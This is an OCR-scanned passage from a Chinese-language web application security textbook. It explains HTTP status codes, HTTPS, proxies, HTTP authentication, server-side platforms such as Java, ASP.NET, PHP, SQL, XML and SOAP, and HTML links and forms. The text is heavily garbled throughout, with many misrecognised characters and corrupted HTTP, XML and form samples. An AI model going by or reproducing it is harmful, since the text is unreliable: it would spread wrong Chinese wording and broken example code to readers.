应 用 程序 时 最 有 可 能 过 到 的 状态 码 及 其 相关 的 原因 短语 。 
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D 100 Continue。 当 客户 端 提交 一 个 包含 主体 的 请 求 时 ,将 发 送 这 个 啊 应 。 该 啊 应 表示 已 
收 到 请 求 消息 头 ， 客 户 端 应 继续 发 送 主体 。 请 求 完 成 后 ， 再 由 服务 需 返 回 另 一 个 啊 应 。 

D 200 ok。 本 状态 码 表 示 已 成 功 提交 请 求 ， 且 响应 主体 中 包含 请 求 结果 。 

口 201 Created。PUT 请 求 的 啊 应 返回 这 个 状态 人 码 ， 表 示 请 求 已 成 功 提 交 。 

D301 Moved Permanentlyo 本 状态 人 码 将 浏览 大 永 久 重 定 问 到 男 外 -个 在 Location 消 息 
头 中 指定 的 URL。 以 后 客户 端 应 使 用 新 URL 蔡 换 原 始 URL。 

口 302 Found。 本 状态 码 将 浏览 硕 暂 时 重 定 癌 到 另外 一 个 在 Tocation 消 息 头 中 指定 的 
URL。 客 户 闻 应 在 随后 的 请 求 中 恢复 使 用 原 娘 URL。 

口 304 Not Modified。 本 状态 码 指示 浏览 右 使 用 绥 存 中 保存 的 所 请 求 资 源 的 副本 。 服 务 
髓 使 用 If-Modified-since 与 Tf-None-Match 消 息 头 确定 客户 端 是 否 拥有 最 新 版 本 的 
资源 。 

D400 Bad Reduest。 本 状态 码 表示 客户 端 提交 了 一 个 无 效 的 HTTP 请 求 。 当 以 某 种 无 效 
的 方式 修改 请 求 时 〈 例如 在 URL 中 插入 一 个 空格 符 )， 可 能 会 遇 到 这 个 状态 码 。 

口 401 Unauthorized。 服务 需 在 许可 请 求 前 要 求 HTTP 进 行 身 份 验证 。www-Authenticate 
消息 头 详细 说 明 所 文 持 的 号 份 验证 类 型 。 

口 403 Forbidden。 本 状态 码 指出 ， 不 管 是 否 通过 吴 份 验证 ， 葵 止 任何 人 访问 被 请 求 的 

口 404 Not Found。 本 状态 码 表示 所 请 求 的 资源 并 不 存在 。 

口 405 Method Not Allowed。 本 状态 码 表示 指定 的 URL 不 文 持 请 求 中 使 用 的 方法 。 例 如 ， 
如 果 试 图 在 不 文 持 puT 方 法 的 地 方 使 用 该 方法 ， 就 会 收 到 本 状态 人 码 。 

D413 Reduest Entity Too Largeo 如 有 果 在 本 地 代码 中 探查 缓冲 融 洲 出 漏洞 并 就 此 提 
交 超 长 数据 串 ， 则 本 状态 码 表示 请 求 主 体 过 长 ， 服 务 顺 无 法 处 理 。 

D 414 Reduest URI Too Longo 与 前 一 个 啊 应 类 似 ， 本 状态 码 表 示 请 求 中 的 URL 过 长 ， 
服务 如 无 法 处 理 。 

口 500 Internal Server Error。 本 状态 码 表示 服务 右 在 执行 请 求 时 遇 到 错误 。 当 提交 
无 法 预料 的 输入 、 在 应 用 程序 处 理 过 程 中 造成 无 法 处 理 的 错误 时 ,通常 会 收 到 本 状态 人 码 。 
应 该 仔细 检查 服务 人 各 啊 应 的 所 有 内 容 ， 了 解 与 错误 性 质 有 关 的 详情 。 

口 503 Service Unavailapble。 通 常 ， 本 状态 人 码 表示 尽管 Web 服 务 右 运转 正常 ， 并 且 能 够 
啊 应 请 求 ， 但 服务 硕 访 问 的 应 用 程序 还 是 无 法 作出 啊 应 。 应 该 进行 核实 ， 是 否 因为 执行 
了 某 种 行为 而 造成 这 个 结果 。 



















































































3.1.9 HTTPS 


HTTP 使 用 普通 的 非 加 密 TCP 作 为 其 传输 机 制 ， 因 此 ， 处 在 网 络 适当 位 置 的 攻击 者 能 人 够 截取 
这 个 机 制 。HTTPS 本 质 上 与 HTTP 一 样 ， 都 属于 应 用 层 协议 ,但 HTTPS 通 过 安全 传输 机 制 一 一 安 
全 套 接 层 ( Secure SocketLayer，SSL ) 传送 数据 。 这 种 机 制 可 保护 通过 网 络 传送 的 所 有 数据 
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的 隐 密 性 与 完整 性 ， 显 著 降 低 非 人 侵 性 拦截 攻击 的 可 能 性 。 不 管 是 否 使 用 SSL 进 行 传输，HTTP 
请 求 与 响应 都 以 完全 相同 的 方式 工作 。 








人 注解 ”如 今 的 SSL 实 际 上 已 经 由 TLS ( Transport Layer Security， 传 输 层 安全 ) 代替 ， 


但 后 者 通常 还 是 使 用 SSL 这 个 名 称 。 





3.1.10 ” HTTP 代理 


HTTP 代 理 服 务 器 是 一 个 协调 客户 端 浏 览 融 与 目标 Web 服 务 融 之 间 访 问 的 服务 需 。 当 配置 浏 
览 姨 使 用 代理 服务 厦 时 ， 它 会 将 所 有 请 求 提交 到 代理 服务 右 ， 代 理 服务 姨 再 将 请 求 转送 给 相关 
Web 服 务 句 ， 并 将 响应 返回 给 浏览 器 。 大 多 数 代 理 还 使 用 其 他 服务 ， 如 缓存 、 验 证 与 访问 控制 。 
值得 注意 的 是 ， 如 果 使 用 代理 服务 器 ，HTTP 的 工作 机 制 会 出 现 两 方面 的 差异 。 

口 当 浏 览 器 回 代 理 服务 融 发 布 HTTP 请 求 时 , 它 会 将 完整 的 URL( 包括 协议 前 级 http:// 与 服务 
器 主机 名 称 ， 在 非 标准 URL 中 ， 还 包括 端口 号 ) 插入 请 求 中 。 代 理 服务 器 将 提取 主机 名 
称 和 端口 ， 并 使 用 这 些 信 息 将 请 求 指 回 正 确 的 目标 Web 服 务 喜 。 

口 当 使 用 HTTPS 时 ， 浏 览 融 无 法 与 代理 服务 亏 进 行 SSL 握 手 ， 因 为 这 样 做 会 破坏 安全 隧道 ， 
使 通信 易于 遭受 拦截 攻击 。 因 此 , 浏览 需 必 须 将 代理 作为 一 个 纯粹 的 TCP 级 中 继 , 由 它 传 
递 浏 览 夯 与 目标 Web 浏 览 硕 之 间 的 所 有 网 络 数据 ， 并 与 浏览 希 进 行 正常 的 SSL 握 手 。 浏 览 
需 使 用 CoNNECT 方 法 向 代理 服务 器 提交 一 个 HTTP 请 求 ， 并 指定 URL 中 的 目标 主机 名 称 与 
端口 号 ， 从 而 建立 这 种 中 继 。 如 果 代 理 允许 该 请 求 ， 它 会 返回 一 个 含 200 状 态 码 的 HTTP 
啊 应 ,一 下 开 放 TCP 连 接 ， 从 此 以 后 作为 目标 Web 服 务 磊 的 纯粹 TCP 级 中 继 。 

从 某 种 程度 上 说 ,攻击 Web 应 用 程序 时 最 有 用 的 工具 是 一 个 处 在 浏览 姨 与 日 标 Web 站 点 之 间 

的 专用 代理 服务 器 ， 使 用 它 可 以 拦截 并 修改 所 有 使 用 HTTPS 的 请 求 与 啊 应 。 我 们 将 在 第 4 童 开始 
分 析 如 何 使 用 这 种 工具 。 
































3.1.11 HTTP 身 份 验 证 


HTTP 拥 有 自己 的 用 户 身份 验证 机 制 ， 使 用 不 同 的 身份 验证 方案 。 
口 Basic。 这 是 一 种 非常 简单 的 身份 验证 机 制 ， 它 在 请 求 消息 头 中 随 每 条 消息 以 Base64 编 码 
字符 串 的 形式 发 送 用 户 证 书 。 
口 NTLM。 这 是 一 种 质询 - 啊 应 式 机 制 ， 它 使 用 某 个 Windows NTLM 协 议 版 本 。 
D Digest。 这 是 一 种 质询 -响应 式 机 制 ， 它 随同 用 户 证 书 一 起 使 用 一 个 随机 值 MD5 校 验 和 。 
虽然 组 织 内 部 经 常 使 用 这 些 身份 验证 协议 访问 内 联网 服务 , 但 因特网 上 的 Web 应 用 程序 基本 
很 少 使 用 它们 。 
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音 误 观 点 “基本 身份 验证 并 不 安全 。” 
基本 身份 验证 将 未 加 密 的 证 书 插入 HTTP 请 求 中 ,因此 ,人 们 普遍 认为 这 种 协议 并 
不 安全 ， 不 应 该 使 用 它们 。 但 实际 上 ， 许 多 银行 使 用 的 基于 表单 的 身份 验证 也 将 未 加 


密 的 证 书 插入 HTTP 请 求 中 。 

可 以 使 用 HTTPS 作 为 传输 机 制 , 防止 任 何 HTTP 消 息 受 到 窃听 攻击 ; 每 一 个 具有 安 
全 意识 的 应 用 程序 都 应 采用 这 种 机 制 。 至 少 从 窃听 方面 来 说 ， 基 本 身份 验证 机 制 并 不 
比 今天 绝 大 多 数 Web 应 用 程序 使 用 的 身份 验证 机 制 更 加 糟糕 。 





3.2 ”Web 功能 


除了 在 客户 端 与 服务 天 之 间 发 送 消息 时 使 用 的 核心 通信 协议 外 ，Web 应 用 程序 还 使 用 许多 不 
同 的 技术 来 实现 其 功能 。 任何 具 有 一 定 功能 的 应 用 程序 都 会 在 其 服务 胡 与 客户 桨 组 件 中 采用 右 干 
种 技术 。 在 癌 Web 应 用 程序 发 动 猛烈 攻击 前 ， 渗 透 测试 员 必 须 对 应 用 程序 如 何 实现 其 功能 、 所 使 
用 技术 的 运作 方式 及 其 可 能 存在 的 弱点 有 一 个 基本 的 了 解 。 























3.2.1 服务 器 新 功能 


早期 的 万 维 网 仪 包含 静态 内 容 。Web 站 点 由 各 种 静态 资源 组 成 ， 如 HTML 页 面 与 图 片 ; 当 用 
户 提交 请 求 时 ， 只 需 将 它们 加 载 到 Web 服 务 顺 ， 再 传送 给 用 户 即 可 。 每 次 用 户 请 求 某 个 特殊 的 资 
源 时 ， 服 务 需 都 会 返回 相同 的 内 容 。 

如 今 的 Web 应 用 程序 仍然 使 用 相当 数量 的 静态 资源 。 但 它们 主要 回 用 户 提 供 动 态 生 成 的 内 
容 。 当 用 户 请 求 一 个 动态 资源 时 ， 服 务 帮 会 动态 建立 啊 应 ,每 个 用 户 都 会 收 到 满足 其 特定 需求 
的 内 容 。 

动态 内 容 由 在 服务 右上 执行 的 脚本 或 其 他 代码 生成 ,在 形式 上 ,这 些 脚 本 类 似 于 计算 机 程序 : 
它们 收 到 各 种 输入 ， 并 人 处理 输入 ， 然 后 占用 户 返 回 输 出 结 

当 用 户 的 浏览 需 提 出 访问 动态 资源 的 请 求 时 ， 它 并 不 仅仅 是 要 求 访问 该 资源 的 副本 。 通 和 党， 
它 还 会 随 请 求 提 交 各 种 参数 。 正 是 这 些 参数 保证 了 服务 器 端 应 用 程序 能 够 生成 适合 各 种 用 户 需求 
的 内 容 。HTTP 请 求 使 用 3 种 主要 方式 向 应 用 程序 传送 参数 . 

口 通过 URIL 查 询 字 符 串 ; 

口 通过 REST 风 格 的 URL 的 文件 路 径 ; 

口 通过 HTTPcookie; 

口 通过 在 请 求 主 体 中 使 用 PosT 方 法 。 

除了 这 些 主要 的 输入 源 以 外 ， 理 论 上 ， 服 务 硕 端 应 用 程序 还 可 以 使 用 HTTP 请 求 的 任何 一 个 
部 分 作为 输入 。 例 如 ， 应 用 程序 可 能 通过 User-aAgent 消 息 头 生成 根据 所 使 用 的 浏览 器 类 型 而 优 
化 的 内 容 。 
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像 常 见 的 计算 机 软件 一 样 ，Web 应 用 程序 也 在 服务 硕 端 使 用 大 量 技术 实现 其 功能 。 这 些 技术 
包括 : 

口 脚本 语言 ， 如 PHP、VBScript 和 Perl; 

口 Web 应 用 程序 平台 ， 如 ASPNET 和 Java; 

口 Web 服 务 磁 ， 如 Apache、IIS 和 Netscape Enterprise; 

口 数据 库 ， 如 MS-SQL、Oracle 和 MySQL; 

口 其 他 后 端 组 件 ， 如 文件 系统 、 基 于 SOAP 的 Web 服 务 和 目录 服务 。 

本 书 将 详细 介绍 这 些 技术 及 其 相关 漏洞 。 下 面 将 介绍 一 些 可 能 遇 到 的 最 常见 的 Web 应 用 程序 
平台 和 语言 。 








© 错误 观点 “我 们 的 应 用 程序 只 需要 粗略 的 安全 检查 ， 因 为 它们 采用 了 非常 实用 的 
框架 。” 
在 开发 Web 应 用 程序 时 ， 使 用 实用 框架 往往 是 人 们 放松 警惕 的 主要 原因 ， 因 为 人 
们 认为 这 样 做 就 可 以 自动 避免 $SQL 注 入 等 常见 的 漏洞 。 但 由 于 以 下 两 方面 的 原因 ， 这 
种 看 法 并 不 正确 。 


首先 ， 大 量 Web 应 用 程序 漏洞 在 应 用 程序 的 设计 ， 而 不 是 实施 阶段 发 生 ， 而 且 ， 
这 些 漏 洞 与 所 采用 的 开发 框架 或 语言 无 关 。 

其 次 ， 上 述 实用 框架 通常 采用 最 新 的 插件 或 程序 包 ， 而 这 些 程 序 包 很 可 能 并 未 经 
过 安全 检查 。 有 趣 的 是 ， 如 果 之 后 在 应 用 程序 中 发 现 漏洞 ， 支 持 使 用 框架 的 开发 者 马 
上 会 改变 立场 ， 转 而 批评 他 们 使 用 的 框架 或 第 三 方程 序 包 。 





1. Java 平 台 
近 几 年 来 ，Java 平 台 企业 版 〈( 原 J2EE ) 事实 上 已 经 成 为 大 型 企业 所 使 用 的 标准 应 用 程序 。 该 
平台 由 Sun 公 司 开 发 ( 现在 则 属于 Oracle 公 司 )。 它 应 用 多 层 与 负载 平衡 架构 ， 非 党 适 于 模块 化 开 
发 与 代码 重复 利用 。 由 于 其 历史 悠久 、 应 用 广泛 ， 因此， 开发 者 在 开发 过 程 中 可 以 利用 许多 高 质 
量 的 开发 工具 、 应 用 程序 服务 如 与 框架 ,Java 平 台 可 在 几 种 基础 型 操作 系统 上 运行 ,包括 Windows、 
Linux 与 Solaris 。 
描述 基于 Java 的 Web 应 用 程序 时 , 往往 会 使 用 许多 易于 混 清 的 术语 ,读者 应 该 对 它们 有 所 警觉。 
口 Enterprise Java Bean (EJB ) 是 一 个 相对 重量 级 的 软件 组 件 ， 它 将 一 个 特殊 业务 功能 的 
逻辑 组 合 到 应 用 程序 中 。EJB 由 在 处 理应 用 程序 开发 者 必须 解决 的 各 种 技术 挑战 ， 如 交易 
完整 性 。 
口 简单 传统 Java 对 象 (Plain Old Java Object，POJO ) 是 一 个 普通 的 Java 对 象 ， 以 区 别 如 EJB 
之 类 的 特殊 对 象 。POJO 币 用 于 表示 那些 用 户 定 义 的 、 比 EJB 更 加 人 简单 且 更 加 轻 量 级 的 对 
象 以 及 用 在 其 他 框架 中 的 对 象 。 
口 Java Servlet 是 应 用 程序 服务 兹 中 的 一 个 对 象 ， 它 接收 客户 端的 HTTP 请 求 并 返回 HTTP 啊 
应 。Servlet 可 使 用 大 量 接口 来 促进 应 用 程序 开发 。 
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口 Java Web 容 器 是 一 个 为 基于 Java 的 Web 应 用 程序 提供 运行 时 环境 的 平台 或 引擎 。Apache 
Tomcat、BEA WebLogic 和 JBoss 都 属于 Java Web 容 做。 
许多 Java Web 应 用 程序 在 定制 代码 中 使 用 第 三 方 与 开源 组 件 。 这 种 做 法 非常 具有 吸引 轧 ， 
为 它 能 够 减轻 开发 工作 ， 而 且 Java 非 常 适 于 使 用 这 种 模块 式 的 方法 。 关 键 应 用 程序 功能 常用 的 组 
件 包括 : 




















口 身份 验证 一 一 JAAS、ACEGI; 

口 表示 层 SiteMesh、 Tapestry; 

口 数据 库 对 象 关系 映射 一 一 Hibernate; 
口 日 志 Lopg4J。 








如 果 能 够 确定 受 攻击 的 应 用 程序 所 使 用 的 开源 软件 包 , 渗透 测试 员 就 可 以 下 载 这 些 软件 包 进 
行 代 码 审查 ， 或 者 安装 它们 开始 攻击 实验 。 这 些 组 件 中 的 任何 一 个 漏洞 都 可 能 被 攻击 者 利用 。 

2. ASP.NET 

ASP.NET 是 Microsoft 开 发 的 一 种 Web 应 用 程序 框架 , 也 是 Java 平 台 的 主要 苋 争 对 于。 ASPNET 
比 Java 平 人 台 晚 几 年 推出 ， 但 它 已 经 占领 了 Java 平 台 的 部 分 市 场 。 

ASPNET 使 用 Microsoft 的 .NET Framework， 提 供 一 个 虚拟 机 [ CLR ( Common Language 
Runtime， 通 用 语言 运行 时 )] 与 一 组 强大 的 API。 因 此 ，ASP.NET 应 用 程序 可 使 用 任何 .NET 语 言 
( 如 C# 或 VB.NET ) 来 编写 。 

ASPNET 和 采用 传统 条 面 软件 向 用 的 事件 驱动 编程 范 型 ， 而 非 许多 早期 Web 应 用 程序 框架 所 使 
用 的 基于 脚本 的 方法 。 基 于 这 种 特点 ， 再 结合 Visual Studio 提 供 的 强大 开发 工具 ， 任 何人 即使 并 
不 具备 吕 练 的 编程 技能 ， 也 能 迅速 开发 出 功能 强大 的 Web 应 用 程序 。 

不 需要 开发 者 做 任何 工作 ，ASPNET 框 架 就 能 防御 一 些 稍 见 的 Web 应 用 程序 漏洞 ， 如 路 站 点 
脚本 。 但 这 种 明显 简化 的 特点 也 造成 一 个 现实 问题 ， 即 许多 小 型 的 ASPNET 应 用 程序 实际 上 由 初 
学 者 开发 ， 他 们 对 于 Web 应 用 程序 面临 的 核心 安全 问题 缺乏 了 解 。 

3. PHP 

PHP 语 言 源 于 一 个 业余 项 目 [ 最 初 该 缩写 词 代表 个 人 主页 (Personal Home Page ) ]。 之 后 ,该 
项 目 迅速 发 展 成 为 一 个 功能 强大 、 应 用 丰富 的 Web 应 用 程序 开发 框架 。PHP 和 常常 与 其 他 免费 技术 
整合 ， 如 所 谓 的 LAMP 组 合 (包括 操作 系统 Linux、Web 服 务 器 Apache 、 数 据 库 服 务 器 MySQL 和 
Web 应 用 程序 编程 语言 PHP )。 

人 们 使 用 PHP 开 发 出 大 量 的 开源 应 用 程序 与 组 件 , 它们 为 常用 的 应 用 程序 功能 提供 了 现成 的 
解决 方案 ， 并 将 其 整合 到 应 用 更 加 广泛 的 定制 应 用 程序 中 ， 例 如 : 















































口 公告 牌 PHPBB、 PHP-Nuke; 

口 管理 前 端 一 PHPMyAdmin; 

口 Web 邮 件 一 一 SquirrelMail、IlohaMail; 
口 相册 Gallery ; 

口 购物 车 osCommerce 、ECW-Shop; 





口 维 客 MediaWiki、 WakkaWikki。 
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由 于 PHP 完 全 免费 ， 简 单 易 用 ， 因 此 许多 编写 Web 应 用 程序 的 初学 者 往往 使 用 它 作 为 首选 语 
言 。 但 是 ， 由 于 历史 原因 ，PHP 框 涤 的 设计 方法 与 默认 配置 导致 程序 员 很 容 多 不 经 意 间 在 代码 中 
引入 安全 漏洞 ， 因 此 使 用 PHP 编 写 的 应 用 程序 中 可 能 包含 大 量 安全 漏洞 。 除 此 之 外 ，PHP 平 人 台 本 
号 也 存在 奉 干 缺 聊 , 在 平台 上 运行 应 用 程序 就 可 对 其 加 以 利用 。 请 参阅 第 19 章 了 解 有 关 PHP 应 用 
程序 向 见 漏洞 的 详情 。 

4. Ruby on Ralls 

Rails 1.0 于 2005 年 发 布 ， 主 要 侧重 于 模型 -视图 -控制 希 体 系 架 构 。Rails 的 主要 优势 在 于 ， 使 
用 它 能 够 以 极 快 的 速度 创建 成 熟 的 数据 驱动 应 用 程序 。 如 果 开 发 者 避 循 Rails 编 码 风 格 和 命名 约 
定 , 则 可 以 使 用 Rails 自 动 生 成 数据 库 内 容 的 模型 、 修 改 该 模型 的 控制 需 操 作 以 及 供应 用 程序 用 户 
使 用 的 默认 视图 。 与 其 他 功能 强大 的 新 技术 一 样 ， 人 们 已 在 Ruby on Rails 中 发 现 了 一 些 漏洞 ， 包 
括 能 够 各 开 “安全 模式 ”， 这 与 在 PHP 中 发 现 的 漏洞 类 似 。 

有 关 最 近 发 现 的 漏洞 的 详细 信息 ， 请 参阅 www.ruby-lang.org/en/security/。 

5. SQL 

结构 化 查询 语言 ( SQL ) 用 于 访问 Oracle、MS-SQL 服 务 器 和 MySQL 等 关系 数据 库 中 的 数据 。 
目前 ， 绝 大 多 数 的 Web 应 用 程序 都 将 基于 SQL 的 数据 库 作 为 它们 的 后 端 数据 仓库 ， 而 且 ， 几 乎 所 
有 应 用 程序 的 功能 都 需要 以 某 种 方式 与 这 些 数 据 仓库 进行 交互 。 

关系 数据 库 将 数据 存储 在 表 中 ,每 个 表 又 由 许多 行 和 列 构 成 。 每 一 列 代表 一 个 数据 字段 ， 如 
名称” 或 “电子 邮件 地 址 ”， 每 一 行 则 代表 为 这 些 字 段 中 的 一 些 或 全 部 字段 分 配 住 的 项 。 

SQL 使 用 查询 来 执行 各 用 的 任务 ， 如 谈 取 、 添 加 、 更 新 和 删除 数据 。 例 如 ， 要 检索 用 户 的 具 
有 指定 名 称 的 电子 邮件 地 址 ， 应 用 程序 可 以 执行 以 下 查询 : 

select email from users where name = 'daf， 

要 实现 它们 所 需 的 功能 ，Web 应 用 程序 可 能 会 将 用 户 提交 的 输入 组 合 到 由 后 端 数据 库 执行 的 
SQL 查询 中 。 如 采 以 危险 的 方式 进行 组 合 ,攻击 者 怠 可 以 提交 恶意 输入 来 干扰 数据 库 的 行为 ， 从 
而 读 取 和 写 人 敏感 数据 。 我 们 将 在 第 9 章 中 介绍 这 些 攻 击 ， 并 详细 说 明 SQL 语 言及 其 用 法 。 

6. XML 

可 扩展 标记 语言 (XML ) 是 一 种 机 器 可 读 格 式 的 数据 编码 规范 。 与 其 他 标记 语言 一 样 ， XML 
格式 将 文档 划分 为 内 容 〈 数 据 ) 和 标记 【给 数据 作 注解 )。 

标记 主要 用 标签 表示 ， 它 们 包括 起 始 标 签 、 结 束 标签 和 空 元 素 标签 : 


<tagname> 













































































</tagname> 


<tagname /> 
起 始 和 结束 标签 成 对 出 现 ， 其 中 可 以 包括 文档 内 容 或 子 元 素 : 


<pPet>ginger</pet> 





<pPets><dog>spot</dog><cat>paws</cat></pets> 
标签 可 以 包含 以 名 / 值 对 出 现 的 属性 : 


<data version="2.]"><pets>...</pets></dQata> 
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XMIL 之 所 以 可 扩展 ， 是 因为 它 可 以 使 用 任意 数量 的 标签 和 属性 名 。XML 文 档 通 常 包 含 文档 
类 型 定义 (DTD )，DTD 定 义 文档 中 使 用 的 标签 、 属 性 及 其 组 合 方式 。 

服务 器 端 和 客户 端 Web 应 用 程序 广泛 采用 XML 及 由 XML 派 生 的 技术 ， 我 们 将 在 本 章 后 面部 
分 介绍 这 些 内 容 。 

7. Web 服 务 

虽然 本 书 主 要 介绍 Web 应 用 程序 攻击 , 但 本 书 介 绍 的 许多 漏洞 同样 适用 于 Web 服 务 。 实际 上 ， 
许多 应 用 程序 本 质 上 就 是 一 组 后 端 Web 服 务 的 GUI 前 端 。 

Web 服 务 使 用 简单 对 象 访问 协议 (SOAP ) 来 交换 数据 。 通 常 ，SOAP 使 用 HTTP 协 议 来 传送 
消息 ， 并 使 用 XML 格式 表示 数据 。 

典型 的 SOAP 请 求 如 下 所 示 : 


POST /doTransfer.asp HTTP/1.0 





Host: mdsec-mgr.int.mdsec.net 
Content-Type: application/soap+xml; charset=utf-8 
Content-Length: 891 
<?xXm] version="1] .0"?> 
<Ssoap:Envelope xmlns:soap="http://www.w3.0rg/2001/12/soap-envelope"> 
<Soap:Body> 
<pre:Add xmlns:pre=http://target/lists soap:encodingStyle-= 
"http:/ /www.w3.org/2001/12/soap-encoding"> 
<ACCOUNt> 
<Fromccount>18281008</FromAccount> 
<AmounNnt>1430</Amount> 
<ClearedFunds>False</ClearedFunds> 
<TOoOACCOuUNt>08447656</ToAccount> 
</ACCOUNt> 
</pPre:Add> 
</Soap:Body> 
</Ssoap: Envelope> 


在 使 用 浏览 右 访 问 Web 应 用 程序 时 很 可 能 会 遇 到 SOAP ， 服 务 咒 端 应 用 程序 使 用 它 与 各 种 后 
端 系统 进行 通信 。 如 果 将 用 户 提交 的 数据 直接 组 合 到 后 端 SOAP 消 息 中 ， 就 可 能 产生 与 SQL 注 入 
类 似 的 漏洞 。 我 们 将 在 第 10 章 详细 介绍 这 些 问题 。 

如 果 Web 应 用 程序 还 直接 公开 Web 服 务 ， 那 么 ， 我 们 还 需要 检查 这 些 Web 服 务 。 即 使 前 端 应 
用 程序 是 基于 Web 服 务 编写 的 ， 但 它们 在 输入 处 理 以 及 服务 本 身 所 披露 的 功能 方面 仍 存在 区 别 。 
正常 情况 下 ， 服 务 器 会 以 Web 服 务 描述 语言 ( WSDL ) 格式 公布 可 用 的 服务 和 人 参数。 攻击 者 可 以 
使 用 soapUI 之 类 的 工具 、 基 于 已 公布 的 WSDL 文 件 创建 示例 请 求 ， 以 调用 身份 验证 Web 服 务 ， 获 
得 身份 验证 令 牌 ， 并 随后 提出 任何 Web 服 务 请 求 。 
































3.2.2 ”客户 病 功 能 


服务 骨 闯 应 用 程序 要 接收 用 户 输入 与 操作 , 并 回 用 户 返回 其 结 来 , 它 必 须 提 供 一 个 客户 桨 用 
户 界 面 。 由 于 所 有 Web 应 用 程序 都 通过 Web 浏 贤人 大 进行 访问 ， 因 此 这 些 界面 共 至 一 个 技术 核心 。 
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然而 ,建立 这 些 界面 的 方法 各 不 相同 。 而 且 ， 近 些 年 来 ， 应 用 程序 利用 客户 端 技术 的 方式 也 一 直 
在 发 生 急 剧变 化 。 

1. HTML 

HTML 是 建立 Web 界 面 所 需 的 核心 技术 。 这 是 一 种 用 于 描述 浏览 絮 所 显示 的 文档 结构 的 基于 
标签 的 语言 。 最 初 ，HIML 只 能 对 文本 文档 进行 简单 的 格式 化 处 理 。 如 今 ， 它 已 经 发 展 成 为 一 种 
应 用 丰富 、 功 能 强大 的 语言 ， 可 用 于 创建 非常 复杂 、 功 能 强大 的 用 户 界面 。 

XHTML 是 HTMEL 的 进化 版 本 ， 它 基于 XML， 并 采用 比 旧版 HTML 更 严格 的 规范 。 之 所 以 推 
出 XHTML， 部 分 是 因为 需要 转 而 采用 一 种 更 加 严格 的 HTML 标 记 标 准 ， 以 避免 由 于 浏览 妖 必 须 
接受 不 太 严 格 的 HTML 格 式 而 导致 的 各 种 攻击 和 安全 问题 。 

有 关 HTML 及 相关 技术 的 详情 ， 请 参阅 下 面 的 几 节 。 

2. 超 链接 

客户 端 与 服务 硕 之 间 的 大 量 通 信 都 由 用 户 单 击 超 链 接 张 动 。Web 应 用 程序 中 的 超 链接 通 稼 包 
含 预 先 设 定 的 请 求 参数 , 这 些 数 据 项 不 需 由 用 户 输入 ,而 是 由 服务 需 将 其 插 人 用 户 单 击 的 超 链 接 
的 目标 URL 中 ， 以 这 种 方式 提交 。 例 如 ，Web 应 用 程序 中 可 能 会 显示 一 系列 新 闻 报道 链接 ， 其 形 
式 如 下 : 

<a href="?redir=/updates/update29,.html">What's happening?</a> 
当 用 户 单 击 这 个 链接 时 ,浏览 右 会 提出 以 下 请 求 : 

GET /news/8/?redir=/updates/update?29 .html HTTP/1.1 

Host: mdsec.net 






































服务 需 收 到 查询 字符 串 中 的 参数 ( newsiq )， 并 使 用 它 的 值 决 定向 用 户 返 回 什 么 内 容 。 

3. 表单 

虽然 基于 超 链 接 的 导航 方法 负责 客户 端 与 服务 需 之 间 的 绝 大 多 数 通 信 , 但 许多 Web 应 用 程序 
还 是 需要 采用 更 灵活 的 形式 收集 输入 ， 并 接收 用 户 输 入 。HTML 表 单 是 一 种 常见 的 机 制 ， 人 允许 用 
户 通 过 浏览 器 提交 任意 输入 。 以 下 是 一 个 由 型 的 HTTP 表 单 : 


<form action="/secure/login.php?app=gquotations”" method="post"> 




















Username: <input type="text'" name="uUusSername'><br> 

Password: <input type="password" name='"'password"> 

<input type="hidden’" name="redir" value="/secure/home.php"> 
<input type="submit’" name="submit" value="1log in"> 

</form> 


当 用 户 在 表单 中 输入 值 并 单 击 “ 提 交 ” 按 钮 时 ， 济 览 侣 将 提出 以 下 请 求 : 


POST /secure/login.php?app=gquotations HTTP/1.1 





Host: walhh-app.com 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 39 

Cookie: SESS=GTnrpx2ss2tSWSnNnNXJGyYGOLJA47MXRSJCFM6BG 


username=daf&password=foo&kredir=/secure/home.php&submit=1log+in 
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在 这 个 请 求 中 ， 有 儿 个 要 点 说 明了 请 求 如 何 使 用 各 种 因素 控制 服务 硕 端 处 理 过 程 。 


口 因为 HTML 表 单 标签 中 包含 一 个 指定 PosT 方 法 的 属性 , 浏览 需 就 使 用 这 个 方法 提交 表单 ， 
并 将 表单 中 的 数据 存 人 请 求 消息 主体 中 。 

口 除 用 户 输 入 的 两 个 数据 外 ， 表 单 中 还 包含 一 个 隐藏 参数 (reaqir ) 与 一 个 提交 参数 
( submit )。 这 两 个 参数 都 在 请 求 中 提交 ， 服 务 需 端 应 用 程序 可 使 用 它们 控制 其 逻辑 。 

口 与 前 面 显示 的 超 链接 示例 一 样 ， 负 责 表 单 提 交 的 目标 URL 也 包含 一 个 预先 设 定 的 参数 
(app )。 该 参数 可 用 于 控制 服务 顺 端 的 处 理 过 程 。 

口 请 求 中 包含 一 个 cookie 参 数 ( sEss )， 服 务 需 在 早先 的 啊 应 中 将 其 发 布 给 浏览 需 。 该 参数 
可 用 于 控制 服务 需 端 处 理 过 程 。 

前 面 的 请 求 中 包含 一 个 消息 头 ， 它 规定 消息 主体 中 的 内 容 类 型 为 x-www-form-urlencoaqaed。 























这 表示 和 URL 查 询 字 符 串 中 的 一 样 , 消息 主体 中 的 参数 也 以 名 / 值 对 表示 。multipart/form-data 
是 提交 表单 数据 时 可 能 遇 到 的 男 一 种 类 型 的 内 容 。 应 用 程序 可 在 表单 标签 的 enctype 属 性 中 要 求 




















浏览 絮 使 用 多 部 分 编码 。 使 用 这 种 编码 形式 ， 请 求 中 的 content-Type 消 息 头 还 会 指定 一 个 随 
机 字符 串 ， 用 它 来 分 隅 请 求 主 体 中 的 参数 。 例 如 ， 如 果 表 单 指定 多 部 分 编码 ， 其 生成 的 请 求 如 
下 所 不 : 


机 


























POST /secure/login.php?app=guotations HITP71L .1 
Host: wahh-app. com 





Content-Type: multipart/form-data; boundary-= 7d71385d0ala 
Content-Length: 369 
Cookie: SESS=GTNnrpx2ss2tSWSnNnNXJGyYGOLJ47MXRSJCFM6Bd 


7d71385d0ala 


Content-Disposition: form-data; name="username" 





有 7d71385d0ala 


Content-Disposition: form-data; name="password" 


foo 
7d71]385d0ala 
Content-Disposition: form-data; name="redir" 





/Secure/home .php 
7d71385d0ala 
Content-Disposition: form-data; name="submit" 





------------ 7d71385d0ala-- 
4. CSS 

层 闭 样式 表 (CSS ) 是 一 种 描述 以 标记 语言 编写 的 文档 的 表示 形式 的 语言 。 在 Web 应 用 程序 
